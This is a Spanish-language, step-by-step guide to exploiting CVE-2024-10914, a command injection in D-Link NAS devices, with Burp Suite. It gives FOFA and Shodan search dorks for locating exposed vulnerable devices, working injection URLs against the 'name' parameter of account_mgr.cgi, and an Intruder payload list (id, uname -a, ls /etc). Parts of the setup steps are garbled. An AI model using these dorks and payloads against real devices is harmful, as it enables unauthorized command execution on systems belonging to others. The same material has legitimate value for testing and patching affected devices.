
CVE-2024-10914_Pruebas manuales con burpsuite
Utilice el siguiente dork de búsqueda para encontrar dispositivos D-Link NAS potencialmente vulnerables:
FOFA:
app="D_Link-DNS-ShareCenter" && server=="lighttpd/1.4.25-devel-fb150ff"
SHODAN:
"http.title:D-Link" product:"lighttpd"
Esta cadena de búsqueda ayuda a identificar dispositivos que ejecutan la aplicación vulnerable D-Link DNS ShareCenter con la versión específica del servidor Lighttpd que está afectada por la vulnerabilidad.
Esta guía proporciona instrucciones paso a paso sobre cómo probar manualmente una Vulnerabilidad de Inyección de Comandos (CVE-2024-10914) en el parámetro name de D-Link NAS utilizando Burp Suite. URL objetivo: http://Target.
127.0.0.1:8080)127.0.0.1 en el puerto 8080.http://Target.Localizar el parámetro vulnerable: En la solicitud interceptada, encuentre el parámetro name en la URL. Debería aparecer como:
/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;...;%27
Inyectar un comando de prueba: Modifique el parámetro name para incluir un comando de prueba como echo "test":
/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;echo%20%22test%22;%27
Enviar la solicitud modificada: Reenvíe la solicitud modificada al servidor.
Verificar la respuesta: Busque la salida del comando inyectado en la respuesta. Por ejemplo, si el servidor ejecutó echo "test", debería ver:
test
Inyectar un comando malicioso: Si la prueba es exitosa, intente comandos más sofisticados, como:
/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;id;%27
Enviar la solicitud de explotación: Reenvíe esta solicitud al servidor.
Analizar la respuesta: Verifique si la salida del comando (por ejemplo, información del ID de usuario) está presente en la respuesta.
Usar Intruder: Automatice las pruebas con la herramienta Intruder de Burp Suite.
name como la posición de carga útil.Cargas útiles de ejemplo:
echo "test"
id
uname -a
ls /etc
Iniciar Intruder: Ejecute el ataque Intruder para probar múltiples cargas útiles automáticamente.